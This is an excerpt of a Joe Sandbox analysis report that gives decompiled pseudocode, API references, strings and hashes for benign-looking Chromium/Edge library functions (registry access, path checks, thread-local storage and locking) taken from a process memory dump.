				_t34 =  &_v40;
				L000A4C80(_t34, "Open", "..\\..\\base\\win\\registry.cc", 0xc2);
				L000C5A40( &_v24, _t34, _t32, _t25);
				_v40 = 0;
				_t19 = RegOpenKeyExW(_t32, _a8, 0, _t25, _t34);
				_t33 = _t19;
				if(_t19 == 0) {
					_t34 = _v44;
					_t23 =  *_t34;
					if(_t23 != 0) {
						RegCloseKey(_t23);
					}
					_t19 = _v40;
					 *_t34 = _v40;
					_t34[1] = _t25;
				}
				E000DE643(E00070790(_t19), _t25, _v20 ^ _t35, _t31, _t33, _t34);
				return _t33;
			}

0x000b1630
0x000b1639
0x000b163c
0x000b163f
0x000b1642
0x000b1649
0x000b164c
0x000b1650
0x000b1663
0x000b1671
0x000b1676
0x000b1685
0x000b168b
0x000b168f
0x000b1691
0x000b1694
0x000b1698
0x000b169b
0x000b169b
0x000b16a1
0x000b16a4
0x000b16ac
0x000b16ac
0x000b16bc
0x000b16ca

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 000B1685
RegCloseKey.ADVAPI32(00000000), ref: 000B169B

Strings

..\..\base\win\registry.cc, xrefs: 000B1658
Open, xrefs: 000B165D

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: CloseOpen
String ID: ..\..\base\win\registry.cc$Open
API String ID: 47109696-830328924
Opcode ID: 3de27be59e1a4667b43741a2b4295ac30074f19f141af84e7d2ae13c62266f11
Instruction ID: 4bf0ebac932b4e62638999bc73e090d4982744bc1ac3abbb4d800eb144c83783
Opcode Fuzzy Hash: 3de27be59e1a4667b43741a2b4295ac30074f19f141af84e7d2ae13c62266f11
Instruction Fuzzy Hash: DA118C75A00209ABDB10EF98DC85ADFBBB8EF48360F540418F815B7282D730AE40CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 000A0240 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E000A0240(void* __eflags, void* __fp0, WCHAR* _a4) {
				void* _v16;
				signed int _v24;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				signed int _t17;
				signed int _t18;
				void* _t23;
				WCHAR* _t24;
				signed int _t26;
				signed int _t27;
				void* _t32;

				_t36 = __fp0;
				_t32 = __eflags;
				_t24 = _a4;
				_t9 =  *0x120014; // 0xf049169a
				_v24 = _t9 ^ _t26;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t17 = (_t27 & 0xfffffff0) - 0x60;
				L000A4C80(_t17, "PathExists", "..\\..\\base\\files\\file_util_win.cc", 0x262);
				_t25 =  &_v96;
				L000A9DD0(_t17,  &_v96, _t23, _t32, __fp0, _t17, 0);
				if(_t24[5] < 0) {
					_t24 =  *_t24;
				}
				_t18 = _t17 & 0xffffff00 | GetFileAttributesW(_t24) != 0xffffffff;
				E000DE643(L000A9E30(_t25, _t23, _t36), _t18, _v24 ^ _t26, _t23, _t24, _t25);
				return _t18;
			}

0x000a0240
0x000a0240
0x000a024c
0x000a024f
0x000a0256
0x000a025a
0x000a025e
0x000a0264
0x000a026a
0x000a0270
0x000a0276
0x000a0288
0x000a0290
0x000a0299
0x000a02a2
0x000a02a4
0x000a02a4
0x000a02b0
0x000a02c0
0x000a02ce

APIs

GetFileAttributesW.KERNEL32(?,?,00000000), ref: 000A02A7

Strings

msedge.exe, xrefs: 000A0245
PathExists, xrefs: 000A0282
..\..\base\files\file_util_win.cc, xrefs: 000A027D

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: AttributesFile
String ID: ..\..\base\files\file_util_win.cc$PathExists$msedge.exe
API String ID: 3188754299-3206840752
Opcode ID: 70ffaa96b8ca6effffb4f156ea7aa98f725f287698827eacc26a0ef50d0e6a05
Instruction ID: 0db7515c247c424d16db15bfc2f723f559f5167cb238f14405f40bccbe1e36e4
Opcode Fuzzy Hash: 70ffaa96b8ca6effffb4f156ea7aa98f725f287698827eacc26a0ef50d0e6a05
Instruction Fuzzy Hash: F701F572A1438567D2109B64CC826AEF768EFCA770F50071EF8D153182EBB0AA8482D2

Uniqueness

Uniqueness Score: -1.00%

Function 000A0790 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A0790() {

				return GetProcAddress(GetModuleHandleA("kernel32.dll"), "PrefetchVirtualMemory");
			}

0x000a07ab

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,000AB388), ref: 000A0798
GetProcAddress.KERNEL32(00000000,PrefetchVirtualMemory), ref: 000A07A4

Strings

PrefetchVirtualMemory, xrefs: 000A079E
kernel32.dll, xrefs: 000A0793

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: PrefetchVirtualMemory$kernel32.dll
API String ID: 1646373207-4069913949
Opcode ID: 8b3294d20b89fe2d66dc54402330dcdc1edc16a9e380b55687b20b3cf6e1e32b
Instruction ID: c9de4097ed3b4c9cd63f56bffe6365fcc5853c17955722453b9e30b5be33b5da
Opcode Fuzzy Hash: 8b3294d20b89fe2d66dc54402330dcdc1edc16a9e380b55687b20b3cf6e1e32b
Instruction Fuzzy Hash: A7B0927158C308BBC50C27E2FE4F8E97F3C9A04A227004020B11A82D98CBA656C08A6B

Uniqueness

Uniqueness Score: -1.00%

Function 000F43ED Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E000F43ED(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x11f330);
				E000DE5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												L000E0C20(_t107, E000DF4BD(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											L000E0C20(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x12420c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x137000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									L000EE930(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x11f350);
									E000DE5F0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E000F43ED(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = L000DEE8F(_t103, _t108[0x18], E000DF4BD( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = L000DEE9F(_t103, _t108[0x18], E000DF4BD( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E000DF4BD();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x000f43ed
0x000f43ef
0x000f43f4
0x000f43f9
0x000f43fb
0x000f43fe
0x000f4403
0x000f4513
0x000f4513
0x000f4513
0x00000000
0x000f4412
0x000f4412
0x000f4417
0x000f4421
0x000f4423
0x000f4428
0x000f442d
0x000f442d
0x000f442f
0x000f4432
0x000f4437
0x000f4459
0x000f4459
0x000f445c
0x000f445f
0x000f447d
0x000f4480
0x000f44bf
0x000f44c2
0x000f44c5
0x000f44ea
0x000f44ec
0x00000000
0x000f44ee
0x000f44ee
0x000f44f0
0x00000000
0x000f44f2
0x000f44f2
0x000f44f7
0x000f44fb
0x000f44fb
0x000f44fc
0x00000000
0x000f44fc
0x000f44f0
0x000f44c7
0x000f44c7
0x000f44c9
0x00000000
0x000f44cb
0x000f44cb
0x000f44cd
0x00000000
0x000f44cf
0x000f44e0
0x00000000
0x000f44e5
0x000f44cd
0x000f44c9
0x000f4482
0x000f4482
0x000f4486
0x00000000
0x000f448c
0x000f448c
0x000f448e
0x00000000
0x000f4494
0x000f449b
0x000f44a3
0x000f44a7
0x000f44a9
0x000f44ac
0x000f44b1
0x000f44b2
0x00000000
0x000f44b2
0x000f44ac
0x00000000
0x000f44a7
0x000f448e
0x000f4486
0x000f4461
0x000f4461
0x00000000
0x000f4461
0x000f443e
0x000f443e
0x000f4443
0x000f4448
0x00000000
0x000f444a
0x000f444c
0x000f4455
0x000f4464
0x000f4466
0x000f4525
0x000f4525
0x000f452a
0x000f452b
0x000f452d
0x000f4532
0x000f4537
0x000f453a
0x000f453d
0x000f4540
0x000f4549
0x000f4549
0x000f4542
0x000f4542
0x000f4542
0x000f454c
0x000f4550
0x000f4553
0x000f4554
0x000f4555
0x000f4556
0x000f4559
0x000f4562
0x000f4562
0x000f4565
0x000f459b
0x000f4567
0x000f4567
0x000f4567
0x000f456a
0x000f4581
0x000f4581
0x000f456a
0x000f45a0
0x000f45aa
0x000f45b6
0x000f4474
0x000f4474
0x000f4479
0x000f447a
0x000f44b4
0x000f44bb
0x000f44ff
0x000f44ff
0x000f4506
0x000f4515
0x000f4518
0x000f4524
0x000f4524
0x000f4466
0x000f4448
0x00000000
0x00000000
0x00000000
0x000f4417

APIs

___AdjustPointer.LIBCMT ref: 000F44B4
___AdjustPointer.LIBCMT ref: 000F44D7
___AdjustPointer.LIBCMT ref: 000F4573

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5792bf112f78d1a1003e866aab144139bc5db55eb67ce4373f125eb0bd11135e
Instruction ID: cd292aae1ba5a5e385ddfdab0cc66ad8d0079b4177a26d7a0c1f48f73638d3be
Opcode Fuzzy Hash: 5792bf112f78d1a1003e866aab144139bc5db55eb67ce4373f125eb0bd11135e
Instruction Fuzzy Hash: 9951077260060AAFEB299F54D841BBB73E4EF40710F14412EEE1557A93E771ED81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 000A94D0 Relevance: 6.2, APIs: 4, Instructions: 151timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 000A952E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A9540
GetSystemTimeAsFileTime.KERNEL32(?), ref: 000A95E6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A95F4

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: cc37c38566996c79101a9c8d3efca0dc1d509828c34509cc4bb12370ffeccb98
Instruction ID: b65a949c7aec06793919679247ffa2f8de97a66999c1c792557c2f83a6f17239
Opcode Fuzzy Hash: cc37c38566996c79101a9c8d3efca0dc1d509828c34509cc4bb12370ffeccb98
Instruction Fuzzy Hash: AE514E71605306AFD314DF68DC84B5AB7E2BB89730F154A2CF8A9877E0D7349989CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000B7340 Relevance: 6.1, APIs: 4, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E000B7340(void* __ebx, void* __edx) {
				signed int _v16;
				char _v2061;
				char _v2064;
				long _v2068;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t36;
				signed int _t43;
				intOrPtr _t44;
				void* _t56;
				void* _t59;
				void* _t61;
				long _t62;
				signed int _t63;
				intOrPtr _t64;
				void* _t69;
				intOrPtr _t72;
				long* _t75;
				long _t76;
				signed int _t77;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t95;
				void* _t98;

				_t69 = __edx;
				_t61 = __ebx;
				_t81 = _t80 - 0x808;
				_t33 =  *0x120014; // 0xf049169a
				_v16 = _t33 ^ _t78;
				_v2068 = 0xffffffff;
				_t62 =  *0x123d68; // 0xffffffff
				_v2068 = _t62;
				if(_t62 != 0xffffffff) {
					L8:
					if((TlsGetValue(_t62) & 0x00000003) != 0) {
						asm("int3");
						asm("ud2");
						goto L11;
					} else {
						_t74 =  &_v2064;
						E000E11A0( &_v2064,  &_v2064, 0, 0x800);
						L000C5B30(_v2068,  &_v2061);
						_t77 = L000DDC23();
						L000E0C20(_t49,  &_v2064, 0x800);
						E000DE643(L000C5B30(_v2068, _t77 | 0x00000003), _t61, _v16 ^ _t78, _t69, _t74, _t77, 0x800);
						return _t77;
					}
				} else {
					_t75 =  &_v2068;
					_t56 = L000C5B00(_t75);
					_t81 = _t81 + 4;
					if(_t56 == 0) {
						L11:
						asm("int3");
						asm("ud2");
						goto L12;
					} else {
						_t62 = _v2068;
						if(_t62 != 0xffffffff) {
							L6:
							asm("lock cmpxchg [0x123d68], ecx");
							if(_t95 != 0) {
								L000C5B20(_t62);
								_t81 = _t81 + 4;
								_t62 =  *0x123d68; // 0xffffffff
								_v2068 = _t62;
							}
							goto L8;
						} else {
							_t59 = L000C5B00(_t75);
							_t81 = _t81 + 4;
							if(_t59 == 0) {
								L12:
								asm("int3");
								asm("ud2");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t78);
								_push(_t75);
								_t76 = _t62;
								_t36 =  *0x134adc;
								_t63 =  *0x123e38; // 0x0
								_t70 =  *[fs:0x2c];
								_t64 =  *((intOrPtr*)( *[fs:0x2c] + _t63 * 4));
								__eflags = _t36 -  *((intOrPtr*)(_t64 + 4));
								if(_t36 >  *((intOrPtr*)(_t64 + 4))) {
									_t36 = L000DDC67(_t36, 0x134adc);
									__eflags =  *0x134adc - 0xffffffff;
									if( *0x134adc == 0xffffffff) {
										_push(4);
										_t44 = L000DDBBC();
										L000A8CE0(_t44);
										 *0x134ad8 = _t44;
										_t36 = L000DDCDD(0x134adc);
									}
								}
								_t72 =  *0x134ad8;
								__imp__TryAcquireSRWLockExclusive(_t72);
								__eflags = _t36;
								if(__eflags == 0) {
									L000A8CF0(_t61, _t72, _t70, __eflags, _t98);
								}
								 *((intOrPtr*)(0x133ed8 + ( *_t76 +  *_t76 * 2) * 4)) = 0;
								 *((intOrPtr*)(0x133edc + ( *_t76 +  *_t76 * 2) * 4)) = 0;
								_t43 =  *_t76 +  *_t76 * 2;
								_t30 = 0x133ee0 + _t43 * 4;
								 *_t30 =  *((intOrPtr*)(0x133ee0 + _t43 * 4)) + 1;
								__eflags =  *_t30;
								__imp__ReleaseSRWLockExclusive(_t72);
								 *_t76 = 0xffffffff;
								return _t43;
							} else {
								_t95 = _v2068 - 0xffffffff;
								if(_t95 == 0) {
									goto L12;
								} else {
									L000C5B20(0xffffffff);
									_t81 = _t81 + 4;
									_t62 = _v2068;
									goto L6;
								}
							}
						}
					}
				}
			}

0x000b7340
0x000b7340
0x000b7345
0x000b734b
0x000b7352
0x000b7355
0x000b735f
0x000b7365
0x000b736e
0x000b73e4
0x000b73ed
0x000b7462
0x000b7463
0x00000000
0x000b73ef
0x000b73ef
0x000b73fd
0x000b7412
0x000b7427
0x000b7430
0x000b7451
0x000b7461
0x000b7461
0x000b7370
0x000b7370
0x000b7377
0x000b737c
0x000b7381
0x000b7465
0x000b7465
0x000b7466
0x00000000
0x000b7387
0x000b7387
0x000b7390
0x000b73c0
0x000b73c5
0x000b73cd
0x000b73d0
0x000b73d5
0x000b73d8
0x000b73de
0x000b73de
0x00000000
0x000b7392
0x000b7393
0x000b7398
0x000b739d
0x000b7468
0x000b7468
0x000b7469
0x000b746b
0x000b746c
0x000b746d
0x000b746e
0x000b746f
0x000b7470
0x000b7474
0x000b7475
0x000b7477
0x000b747c
0x000b7482
0x000b7489
0x000b748c
0x000b7492
0x000b74f0
0x000b74f8
0x000b74ff
0x000b7501
0x000b7503
0x000b750f
0x000b7514
0x000b751f
0x000b7524
0x000b74ff
0x000b7494
0x000b749b
0x000b74a1
0x000b74a3
0x000b74e4
0x000b74e4
0x000b74aa
0x000b74ba
0x000b74c7
0x000b74ca
0x000b74ca
0x000b74ca
0x000b74d2
0x000b74d8
0x000b74e1
0x000b73a3
0x000b73a3
0x000b73aa
0x00000000
0x000b73b0
0x000b73b2
0x000b73b7
0x000b73ba
0x00000000
0x000b73ba
0x000b73aa
0x000b739d
0x000b7390
0x000b7381

APIs

TlsGetValue.KERNEL32(FFFFFFFF), ref: 000B73E5

Part of subcall function 000C5B00: TlsAlloc.KERNEL32(?,000B737C,FFFFFFFF), ref: 000C5B03

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 000B749B
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000B74D2
__Init_thread_header.LIBCMT ref: 000B74F0

Part of subcall function 000C5B20: TlsFree.KERNEL32(000B73D5,?,000B73D5,?), ref: 000C5B26

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireAllocFreeInit_thread_headerReleaseValue
String ID:
API String ID: 734190636-0
Opcode ID: 11b799670e670b9ed1123a0ccbf1118096bff84ad4f850d919ed8630c80b74c0
Instruction ID: f7e7fca89b32fbf97d60b740de5396782edf70a0fec38e90978d6f2766caff57
Opcode Fuzzy Hash: 11b799670e670b9ed1123a0ccbf1118096bff84ad4f850d919ed8630c80b74c0
Instruction Fuzzy Hash: DF41F7719002086FD620AB28EC41BE937A4FF82321F004679E5A9577D2DF716A96CF91

Uniqueness

Uniqueness Score: -1.00%

Function 000B7030 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E000B7030(void* __fp0) {
				signed int _v20;
				char _v2067;
				char _v2068;
				char _v5132;
				char _v5140;
				signed int _v5144;
				signed int _v5148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t33;
				intOrPtr _t39;
				signed char _t43;
				intOrPtr _t46;
				signed int _t49;
				char* _t50;
				signed int _t53;
				signed int _t54;
				signed int _t57;
				intOrPtr* _t60;
				intOrPtr _t65;
				signed int _t67;
				void* _t68;
				void* _t71;
				void* _t72;
				void* _t85;

				_t85 = __fp0;
				L000DEF60(0x140c);
				_t31 =  *0x120014; // 0xf049169a
				_v20 = _t31 ^ _t67;
				_t33 =  *0x123d68; // 0xffffffff
				if(_t33 == 0xffffffff) {
					L17:
					__eflags = _v20 ^ _t67;
					return E000DE643(_t33, _t49, _v20 ^ _t67, _t62, 1, _t65);
				}
				_t49 = _t33;
				if((_t49 & 0x00000003) == 0) {
					goto L17;
				}
				_t49 = _t49 & 0xfffffffc;
				L000E0C20( &_v2068, _t49, 0x800);
				_t53 =  *0x123d68; // 0xffffffff
				_v5144 = _t53;
				L000C5B30(_t53,  &_v2067);
				_t71 = _t68 + 0x14;
				if(_t49 != 0) {
					L000DDC2C(_t49);
					_t71 = _t71 + 4;
				}
				_t39 =  *0x134adc;
				_t54 =  *0x123e38; // 0x0
				_t62 =  *[fs:0x2c];
				if(_t39 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t54 * 4)) + 4))) {
					_t39 = L000DDC67(_t39, 0x134adc);
					_t71 = _t71 + 4;
					__eflags =  *0x134adc - 0xffffffff;
					if(__eflags == 0) {
						_push(4);
						_t46 = L000DDBBC();
						L000A8CE0(_t46);
						 *0x134ad8 = _t46;
						_t39 = L000DDCDD(0x134adc);
						_t71 = _t71 + 8;
					}
				}
				_t65 =  *0x134ad8;
				__imp__TryAcquireSRWLockExclusive(_t65);
				if(_t39 == 0) {
					L000A8CF0(_t49, _t65, _t62, __eflags, _t85);
				}
				L000E0C20( &_v5140, 0x133ed8, 0xc00);
				_t72 = _t71 + 0xc;
				__imp__ReleaseSRWLockExclusive(_t65);
				_t43 = 1;
				_t57 = 0x101;
				while((_t43 & 0x00000001) != 0) {
					_v5148 = _t57;
					_t50 =  &_v5132;
					_t43 = 0;
					do {
						_t65 =  *((intOrPtr*)(_t67 + 0xfffffffffffff7f0));
						if(_t65 != 0 &&  *((intOrPtr*)(_t49 - 8)) != 0 &&  *((intOrPtr*)(_t67 + 0xfffffffffffff7f4)) ==  *_t49) {
							_t60 =  *((intOrPtr*)(_t49 - 4));
							if(_t60 != 0) {
								 *((intOrPtr*)(_t67 + 0xfffffffffffff7f0)) = 0;
								 *0x137000();
								 *_t60(_t65);
								_t72 = _t72 + 4;
								_t43 = 1;
							}
						}
						_t49 = _t50 + 0xc;
					} while (1 != 0x100);
					_t57 = _v5148 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						break;
					}
				}
				_t33 = L000C5B30(_v5144, 2);
				_t68 = _t72 + 8;
				goto L17;
			}

0x000b7030
0x000b703b
0x000b7040
0x000b7047
0x000b704a
0x000b7052
0x000b718a
0x000b718d
0x000b719e
0x000b719e
0x000b705f
0x000b7064
0x00000000
0x00000000
0x000b706a
0x000b707a
0x000b7082
0x000b708f
0x000b7096
